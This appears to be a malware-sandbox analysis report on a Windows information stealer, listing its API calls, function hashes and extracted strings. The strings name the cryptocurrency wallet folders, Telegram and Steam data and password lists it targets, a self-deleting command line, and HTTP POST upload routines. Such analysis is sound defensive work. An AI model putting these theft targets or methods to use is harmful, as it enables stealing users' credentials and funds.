String ID: "countryCode":"$"query":"$%APPDATA%\Ethereum\keystore\$%APPDATA%\Exodus\$%APPDATA%\Jaxx\Local Storage\$%APPDATA%\MultiBitHD\$%DSK_$%appdata%\Electrum-LTC\wallets\$%appdata%\Electrum\wallets\$%appdata%\Telegram Desktop\tdata\$%comspec%$*.json,*.seco$++++$/c %WINDIR%\system32\timeout.exe 3 & del "$<$</c>$</coks$</d>$</file$</info$</ip$</n>$</pwds$<c>$<coks$<d>$<file$<info$<ip$<n>$<pwds$Coins$Coins\Electrum$Coins\Electrum-LTC$Coins\Ethereum$Coins\Exodus$Coins\Jaxx\Local Storage\$Coins\MultiBitHD$D877F783D5*,map*$Files\$GET$PasswordsList.txt$Skype$Steam$System.txt$T_@$Telegram$UTC*$exit$http://ip-api.com/json$image/jpeg$ip.txt$mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml$scr.jpg
API String ID: 2865495769-3281574059
Opcode ID: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
Instruction ID: 12fbeab09d86b4d4d3426c2dede24d6d64c59345960e79b613594a42cd3754e1
Opcode Fuzzy Hash: 0ab0c4a4a8e2312ad0975d62049ca3f383255c93c7323e42e5c8637e5f969f60
Instruction Fuzzy Hash: 91A21A34A002199BDB10EB55DC91BDEB7B5EF49304F5080BBF408BB291DB78AE858F59

Function 00417216 Relevance: 57.8, APIs: 20, Strings: 13, Instructions: 64
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crtdll.dll,wcscmp), ref: 0041722F
GetProcAddress.KERNEL32(00000000,crtdll.dll), ref: 00417235
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417249
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041724F
LoadLibraryA.KERNEL32(Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417263
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417269
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 0041727D
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 00417283
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll,wcscmp), ref: 00417297
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 0041729D
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll,GdiplusStartup,00000000,crtdll.dll), ref: 004172B1
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172B7
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll,GdiplusShutdown,00000000,Gdiplus.dll), ref: 004172CB
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172D1
LoadLibraryA.KERNEL32(Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll,GdipCreateBitmapFromHBITMAP,00000000,Gdiplus.dll), ref: 004172E5
GetProcAddress.KERNEL32(00000000,Gdiplus.dll), ref: 004172EB
LoadLibraryA.KERNEL32(ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll,GdipGetImageEncodersSize,00000000,Gdiplus.dll), ref: 004172FF
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 00417305
LoadLibraryA.KERNEL32(ole32.dll,GetHGlobalFromStream,00000000,ole32.dll,CreateStreamOnHGlobal,00000000,Gdiplus.dll,GdipSaveImageToStream,00000000,Gdiplus.dll,GdipDisposeImage,00000000,Gdiplus.dll,GdipGetImageEncoders,00000000,Gdiplus.dll), ref: 00417319
GetProcAddress.KERNEL32(00000000,ole32.dll), ref: 0041731F

Strings

GdipSaveImageToStream, xrefs: 004172DB
GetHGlobalFromStream, xrefs: 0041730F
GdiplusStartup, xrefs: 0041723F
Gdiplus.dll, xrefs: 00417244, 0041725E, 00417278, 00417292, 004172AC, 004172C6, 004172E0
ole32.dll, xrefs: 004172FA, 00417314
GdipGetImageEncodersSize, xrefs: 0041728D
crtdll.dll, xrefs: 0041722A
wcscmp, xrefs: 00417225
GdipDisposeImage, xrefs: 004172C1
GdipCreateBitmapFromHBITMAP, xrefs: 00417273
GdiplusShutdown, xrefs: 00417259
CreateStreamOnHGlobal, xrefs: 004172F5
GdipGetImageEncoders, xrefs: 004172A7

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CreateStreamOnHGlobal$GdipCreateBitmapFromHBITMAP$GdipDisposeImage$GdipGetImageEncoders$GdipGetImageEncodersSize$GdipSaveImageToStream$Gdiplus.dll$GdiplusShutdown$GdiplusStartup$GetHGlobalFromStream$crtdll.dll$ole32.dll$wcscmp
API String ID: 2574300362-2815069134
Opcode ID: 6066d74275340564eb798eb54cff0014ed99463c17dffbc14204bf95336a66af
Instruction ID: 88d1ed536910c73cd15d425763909c73792c0e606fd49294d8ff60234fce0fcb
Opcode Fuzzy Hash: 6066d74275340564eb798eb54cff0014ed99463c17dffbc14204bf95336a66af
Instruction Fuzzy Hash: BD11EDF16D8304B5C60077F2FD47ADA26657645709361453BBE10B20E2D57C6881A69D

Function 004065F0 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406D53,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 0040660D

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
Instruction ID: 8736a32cbc394a18a167da55deab102dfeb87f5e75d2630db682c36262db7282
Opcode Fuzzy Hash: 13019b4b1f29ee0087aebdb125924ac5399b3b0493059617e1aab9744803bb35
Instruction Fuzzy Hash: 26E086717042024BD310AF6CDC81A9976E89B48315F00483AB896D73D1FE3DDE189757

Function 00405668 Relevance: 217.3, APIs: 62, Strings: 62, Instructions: 307
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00418711), ref: 00405679
GetProcAddress.KERNEL32(00000000,ExpandEnvironmentStringsW), ref: 00405688
GetProcAddress.KERNEL32(00000000,GetComputerNameW), ref: 0040569A
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatus), ref: 004056AC
GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 004056BE
GetProcAddress.KERNEL32(00000000,GetFileSize), ref: 004056D0
GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 004056E2
GetProcAddress.KERNEL32(00000000,ReadFile), ref: 004056F4
GetProcAddress.KERNEL32(00000000,GetFileAttributesW), ref: 00405706
GetProcAddress.KERNEL32(00000000,CreateMutexA), ref: 00405718
GetProcAddress.KERNEL32(00000000,ReleaseMutex), ref: 0040572A
GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0040573C
GetProcAddress.KERNEL32(00000000,GetCurrentDirectoryW), ref: 0040574E
GetProcAddress.KERNEL32(00000000,SetEnvironmentVariableW), ref: 00405760
GetProcAddress.KERNEL32(00000000,SetCurrentDirectoryW), ref: 00405772
GetProcAddress.KERNEL32(00000000,FindFirstFileW), ref: 00405784
GetProcAddress.KERNEL32(00000000,FindNextFileW), ref: 00405796
GetProcAddress.KERNEL32(00000000,LocalFree), ref: 004057A8
GetProcAddress.KERNEL32(00000000,GetTickCount), ref: 004057BA
GetProcAddress.KERNEL32(00000000,CopyFileW), ref: 004057CC
GetProcAddress.KERNEL32(00000000,FindClose), ref: 004057DE
GetProcAddress.KERNEL32(00000000,GlobalMemoryStatusEx), ref: 004057F0
GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00405802
GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 00405814
GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 00405826
GetProcAddress.KERNEL32(00000000,GetModuleFileNameW), ref: 00405838
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040584A
GetProcAddress.KERNEL32(00000000,GetLocaleInfoA), ref: 0040585C
GetProcAddress.KERNEL32(00000000,GetLocalTime), ref: 0040586E
GetProcAddress.KERNEL32(00000000,GetTimeZoneInformation), ref: 00405880
GetProcAddress.KERNEL32(00000000,RemoveDirectoryW), ref: 00405892
GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 004058A4
GetProcAddress.KERNEL32(00000000,GetLogicalDriveStringsA), ref: 004058B6
GetProcAddress.KERNEL32(00000000,GetDriveTypeA), ref: 004058C8
GetProcAddress.KERNEL32(00000000,CreateProcessW), ref: 004058DA
LoadLibraryA.KERNEL32(advapi32.dll,00000000,CreateProcessW,00000000,GetDriveTypeA,00000000,GetLogicalDriveStringsA,00000000,DeleteFileW,00000000,RemoveDirectoryW,00000000,GetTimeZoneInformation,00000000,GetLocalTime,00000000), ref: 004058E9
GetProcAddress.KERNEL32(00000000,GetUserNameW), ref: 004058F8
GetProcAddress.KERNEL32(00000000,RegCreateKeyExW), ref: 0040590A
GetProcAddress.KERNEL32(00000000,RegQueryValueExW), ref: 0040591C
GetProcAddress.KERNEL32(00000000,RegCloseKey), ref: 0040592E
GetProcAddress.KERNEL32(00000000,RegOpenKeyExW), ref: 00405940
GetProcAddress.KERNEL32(00000000,AllocateAndInitializeSid), ref: 00405952
GetProcAddress.KERNEL32(00000000,LookupAccountSidA), ref: 00405964
GetProcAddress.KERNEL32(00000000,CreateProcessAsUserW), ref: 00405976
GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00405988
GetProcAddress.KERNEL32(00000000,RegOpenKeyW), ref: 0040599A
GetProcAddress.KERNEL32(00000000,RegEnumKeyW), ref: 004059AC
GetProcAddress.KERNEL32(00000000,RegEnumValueW), ref: 004059BE
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 004059D0
GetProcAddress.KERNEL32(00000000,CryptCreateHash), ref: 004059E2
GetProcAddress.KERNEL32(00000000,CryptHashData), ref: 004059F4
GetProcAddress.KERNEL32(00000000,CryptGetHashParam), ref: 00405A06
GetProcAddress.KERNEL32(00000000,CryptDestroyHash), ref: 00405A18
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00405A2A
LoadLibraryA.KERNEL32(user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData,00000000,CryptCreateHash,00000000,CryptAcquireContextA,00000000,RegEnumValueW,00000000), ref: 00405A39
GetProcAddress.KERNEL32(75A50000,EnumDisplayDevicesW), ref: 00405A4E
GetProcAddress.KERNEL32(75A50000,wvsprintfA), ref: 00405A63
GetProcAddress.KERNEL32(75A50000,GetKeyboardLayoutList), ref: 00405A78
LoadLibraryA.KERNEL32(shell32.dll,75A50000,GetKeyboardLayoutList,75A50000,wvsprintfA,75A50000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000,CryptGetHashParam,00000000,CryptHashData), ref: 00405A87
GetProcAddress.KERNEL32(75320000,ShellExecuteExW), ref: 00405A9C
LoadLibraryA.KERNEL32(ntdll.dll,75320000,ShellExecuteExW,shell32.dll,75A50000,GetKeyboardLayoutList,75A50000,wvsprintfA,75A50000,EnumDisplayDevicesW,user32.dll,00000000,CryptReleaseContext,00000000,CryptDestroyHash,00000000), ref: 00405AAB
GetProcAddress.KERNEL32(76E80000,RtlComputeCrc32), ref: 00405AC0

Strings

CryptHashData, xrefs: 004059EC
RegEnumKeyW, xrefs: 004059A4
ReleaseMutex, xrefs: 00405722
EnumDisplayDevicesW, xrefs: 00405A43
RegQueryValueExW, xrefs: 00405914
AllocateAndInitializeSid, xrefs: 0040594A
CryptDestroyHash, xrefs: 00405A10
Process32NextW, xrefs: 0040581E
GetLogicalDriveStringsA, xrefs: 004058AE
LocalFree, xrefs: 004057A0
CryptGetHashParam, xrefs: 004059FE
CreateFileW, xrefs: 004056B6
GetLocalTime, xrefs: 00405866
user32.dll, xrefs: 00405A34
GetFileSize, xrefs: 004056C8
RegCreateKeyExW, xrefs: 00405902
RemoveDirectoryW, xrefs: 0040588A
ntdll.dll, xrefs: 00405AA6
shell32.dll, xrefs: 00405A82
CheckTokenMembership, xrefs: 00405980
ReadFile, xrefs: 004056EC
GetDriveTypeA, xrefs: 004058C0
kernel32.dll, xrefs: 00405674
CloseHandle, xrefs: 004056DA
GlobalMemoryStatus, xrefs: 004056A4
FindFirstFileW, xrefs: 0040577C
GetUserNameW, xrefs: 004058F0
advapi32.dll, xrefs: 004058E4
FindNextFileW, xrefs: 0040578E
GetFileAttributesW, xrefs: 004056FE
RegOpenKeyExW, xrefs: 00405938
GetKeyboardLayoutList, xrefs: 00405A6D
DeleteFileW, xrefs: 0040589C
RtlComputeCrc32, xrefs: 00405AB5
SetEnvironmentVariableW, xrefs: 00405758
CreateProcessAsUserW, xrefs: 0040596E
FindClose, xrefs: 004057D6
CreateToolhelp32Snapshot, xrefs: 004057FA
GetTickCount, xrefs: 004057B2
GetTimeZoneInformation, xrefs: 00405878
ShellExecuteExW, xrefs: 00405A91
ExpandEnvironmentStringsW, xrefs: 00405680
GetComputerNameW, xrefs: 00405692
CreateMutexA, xrefs: 00405710
CreateProcessW, xrefs: 004058D2
CopyFileW, xrefs: 004057C4
RegCloseKey, xrefs: 00405926
CryptReleaseContext, xrefs: 00405A22
GetModuleFileNameW, xrefs: 00405830
GetCurrentDirectoryW, xrefs: 00405746
GetLocaleInfoA, xrefs: 00405854
RegEnumValueW, xrefs: 004059B6
CryptCreateHash, xrefs: 004059DA
LookupAccountSidA, xrefs: 0040595C
SetCurrentDirectoryW, xrefs: 0040576A
SetDllDirectoryW, xrefs: 00405842
CryptAcquireContextA, xrefs: 004059C8
wvsprintfA, xrefs: 00405A58
GetLastError, xrefs: 00405734
GlobalMemoryStatusEx, xrefs: 004057E8
Process32FirstW, xrefs: 0040580C
RegOpenKeyW, xrefs: 00405992

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: AllocateAndInitializeSid$CheckTokenMembership$CloseHandle$CopyFileW$CreateFileW$CreateMutexA$CreateProcessAsUserW$CreateProcessW$CreateToolhelp32Snapshot$CryptAcquireContextA$CryptCreateHash$CryptDestroyHash$CryptGetHashParam$CryptHashData$CryptReleaseContext$DeleteFileW$EnumDisplayDevicesW$ExpandEnvironmentStringsW$FindClose$FindFirstFileW$FindNextFileW$GetComputerNameW$GetCurrentDirectoryW$GetDriveTypeA$GetFileAttributesW$GetFileSize$GetKeyboardLayoutList$GetLastError$GetLocalTime$GetLocaleInfoA$GetLogicalDriveStringsA$GetModuleFileNameW$GetTickCount$GetTimeZoneInformation$GetUserNameW$GlobalMemoryStatus$GlobalMemoryStatusEx$LocalFree$LookupAccountSidA$Process32FirstW$Process32NextW$ReadFile$RegCloseKey$RegCreateKeyExW$RegEnumKeyW$RegEnumValueW$RegOpenKeyExW$RegOpenKeyW$RegQueryValueExW$ReleaseMutex$RemoveDirectoryW$RtlComputeCrc32$SetCurrentDirectoryW$SetDllDirectoryW$SetEnvironmentVariableW$ShellExecuteExW$advapi32.dll$kernel32.dll$ntdll.dll$shell32.dll$user32.dll$wvsprintfA
API String ID: 2238633743-3531362093
Opcode ID: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
Instruction ID: b4e9e9acb65dceb8197331e62ecd6ac44c6462922570a5848b60e957845f71d1
Opcode Fuzzy Hash: dde84a1b0545234da602e85d90304d20f92d552cdb0d366e7dc8fbeb5297048c
Instruction Fuzzy Hash: 6EB15BB1A90710AFD700BFA5DC86A6A37A8FB4A704351593BB550FF2E5D6789C008F9C

Function 00417820 Relevance: 45.8, APIs: 17, Strings: 9, Instructions: 269
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178AC
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00417C31,?,00000000,00000000,?,00418203,00000000,?,?,?), ref: 004178C0
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 004178D4
GetProcAddress.KERNEL32(00000000,-00000017), ref: 004178EB
GetProcAddress.KERNEL32(00000000,-00000025), ref: 00417902
GetProcAddress.KERNEL32(00000000,-0000002C), ref: 00417919
GetProcAddress.KERNEL32(00000000,-00000031), ref: 00417930
GetProcAddress.KERNEL32(00000000,-00000036), ref: 00417947
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 0041795E
GetProcAddress.KERNEL32(00000000,-00000044), ref: 00417975
WSAStartup.WS2_32(00000000,?), ref: 00417A08
socket.WS2_32(00000002,00000001,00000000), ref: 00417A1C
gethostbyname.WS2_32(00000000), ref: 00417A3F
htons.WS2_32(00000000), ref: 00417A5F
connect.WS2_32(00000000,00000002,00000010), ref: 00417A76
send.WS2_32(00000000,00000000,00000000,00000000), ref: 00417B46
closesocket.WS2_32(00000000), ref: 00417BA5

Strings

Connection: close, xrefs: 00417AA1
, xrefs: 00417AFA
Content-Length: , xrefs: 00417AB5
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 00417AAB
wsock32.dll, xrefs: 00417899
User-agent: , xrefs: 00417AA6
Host: , xrefs: 00417A94
, xrefs: 00417BB2
HTTP/1.0, xrefs: 00417A8F

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModuleStartupclosesocketconnectgethostbynamehtonssendsocket
String ID: $$ HTTP/1.0$Connection: close$Content-Length: $Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$User-agent: $wsock32.dll
API String ID: 4159890453-3355491746
Opcode ID: b831acf75b33ce788b8c120819d800a9bb333e76fc7a647fd8acf93ac5003d10
Instruction ID: 40f87eb91c0466ae62d4265024b0cddbd223269e9b4c2b0dfc8b3cbba4f3f7f6
Opcode Fuzzy Hash: b831acf75b33ce788b8c120819d800a9bb333e76fc7a647fd8acf93ac5003d10
Instruction Fuzzy Hash: 22B101B19042099BDB10EF65DC86ADFBBB8BB04309F10407BE505F22D1DB78AA458F98

Function 00417D84 Relevance: 40.6, APIs: 17, Strings: 6, Instructions: 375
libraryloadernetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E0F
LoadLibraryA.KERNEL32(00000000,00000000,00000000,00418292,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 00417E23
GetProcAddress.KERNEL32(00000000,-0000000C), ref: 00417E37
GetProcAddress.KERNEL32(00000000,-0000001A), ref: 00417E4C
GetProcAddress.KERNEL32(00000000,-0000002B), ref: 00417E61
GetProcAddress.KERNEL32(00000000,-0000003C), ref: 00417E76
GetProcAddress.KERNEL32(00000000,-00000053), ref: 00417E8B
GetProcAddress.KERNEL32(00000000,-00000064), ref: 00417EA0
GetProcAddress.KERNEL32(00000000,-00000075), ref: 00417EB5
GetProcAddress.KERNEL32(00000000,-00000089), ref: 00417ECB
GetProcAddress.KERNEL32(00000000,-0000009B), ref: 00417EE2
InternetCrackUrlA.WININET(00000000,00000000,90000000,?,00000000,-0000009B,00000000,-00000089,00000000,-00000075,00000000,-00000064,00000000,-00000053,00000000,-0000003C), ref: 00417FCE
InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1),00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041805F
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000,?,?,?,?,00000000,00000000,00000000), ref: 0041809F
HttpOpenRequestA.WININET(00000000,00000000,?,00000000,00000000,00000000,84003300,00000000,?,?,?,?,00000000,00000000,00000000), ref: 004180FC
HttpSendRequestA.WININET(00000000,004183CC,00000000,00000000,00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 0041814D
InternetCloseHandle.WININET(00000000,?,?,?,?,00000000,00000000,00000000,?,004187F5,00000000), ref: 004181AF

Strings

.bit, xrefs: 00418003
POST, xrefs: 00417DD8, 00418206
wininet.dll, xrefs: 00417DFC
BF468D66, xrefs: 00418226
Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1), xrefs: 0041805A
Host: , xrefs: 0041802C

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressProc$Internet$HandleHttpOpenRequest$CloseConnectCrackLibraryLoadModuleSend
String ID: .bit$BF468D66$Host: $Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)$POST$wininet.dll
API String ID: 4078552840-2667470685
Opcode ID: 663d0bd0c9236ae1abf8be16e734511edf0ae365a5ce7ac882a09d6eb9fc6dbd
Instruction ID: 5b133b9addfad1444578419e9148cb156d847e9dbbf5ea098b4cdfe065b0ee4c
Opcode Fuzzy Hash: 663d0bd0c9236ae1abf8be16e734511edf0ae365a5ce7ac882a09d6eb9fc6dbd
Instruction Fuzzy Hash: 01E10FB1900218ABDB10EFA5CC46FDEBBB8BF48305F10457AF504B7691DB78AA45CB58

Function 00406BD8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 48
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00403C18: SysReAllocStringLen.OLEAUT32(?,00406C70,00000002), ref: 00403C2E

RegCreateKeyExW.KERNELBASE(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000000,00000000,00020019,00000000,?,00000000,?,00406D40,00000000,00406E52), ref: 00406C1A
RegQueryValueExW.KERNELBASE(?,ProductName,00000000,00000000,?,?,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000), ref: 00406C3F
RegCloseKey.KERNELBASE(00000000,?,00406D40,00000000,00406E52,?,?,?,00000006,00000000,00000000,?,0041872E,?), ref: 00406C60

Strings

ProductName, xrefs: 00406C2E
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00406C09

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AllocCloseCreateQueryStringValue
String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 3260168215-1787575317
Opcode ID: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
Instruction ID: 11e12cba7479b8b01b9fafc70b7cecbc040d8651ce68523128cfa86d41fe4498
Opcode Fuzzy Hash: 09c98a5aa4f7f8a43bb87bbdd4569b0506a6d9cca1e5576b00417c1847076580
Instruction Fuzzy Hash: A4011E703843016BE310DA58CC81F4673E8EB48B04F104435B695EB2D0DAB4ED14975A

Function 0040A6AA Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 10
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(crypt32.dll,CryptUnprotectData), ref: 0040A6BF
GetProcAddress.KERNEL32(00000000,crypt32.dll), ref: 0040A6C5

Strings

CryptUnprotectData, xrefs: 0040A6B5
crypt32.dll, xrefs: 0040A6BA

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: CryptUnprotectData$crypt32.dll
API String ID: 2574300362-1827663648
Opcode ID: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
Instruction ID: e6c421c79dddd478bde07d5489d503c1d4cc859a9cbe04b01679e24e10095fcf
Opcode Fuzzy Hash: 6dc0792021c7f50060aa7ba59d25f2a2961755a6251dfcb882a20cdecde9314b
Instruction Fuzzy Hash: 49C08CF06A030056CA01EBB29D4A70833693B82B887180C3BB040B14E0D93E4010970F

Function 00407D14 Relevance: 4.6, APIs: 3, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LookupAccountSidA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,00407DD2), ref: 00407D95
CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407DA8
FreeSid.ADVAPI32(00000000,00407DD9), ref: 00407DCC

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AccountCheckFreeLookupMembershipToken
String ID:
API String ID: 1602037265-0
Opcode ID: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
Instruction ID: 27b9dc68911105edb543898119344a1168ea53adb1432c2ff39c990f87532faf
Opcode Fuzzy Hash: 5e83c9b084e7e35297349d76812e9dffc00df868e7d935d63620226d682594f6
Instruction Fuzzy Hash: 0E21B575A04209AFDB41CBA8DC51BEFB7F8EB08700F104466EA14E7290E775AA008BA5

Function 00404150 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 0040415E

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 0040415D

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 2525500382-1514646153
Opcode ID: 76b0c5c92c78ac420becf6784fc6a1da342b91989b07b055a819ce3e10a128ad
Instruction ID: b7488d83487bcecb75417ccbdbd58e5acfbbdb6a2dc67c9614fc1c7d46415314
Opcode Fuzzy Hash: 76b0c5c92c78ac420becf6784fc6a1da342b91989b07b055a819ce3e10a128ad
Instruction Fuzzy Hash: D2D012F42006025AD7488E29855593B776E5BD1700328867EA101AF2C4DB39E841DB38

Function 004033F4 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,004186F7,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000002.00000002.2192831698.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_UoktqWamLR.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 83c72d89bf64d36d3e307e14c4e851507ac80ccff3e714fe6ab68af5963cad7f
Instruction ID: 3efb88752543cb7b7411b8850ba760202313331cae5217d67b69a3078a3e17bb
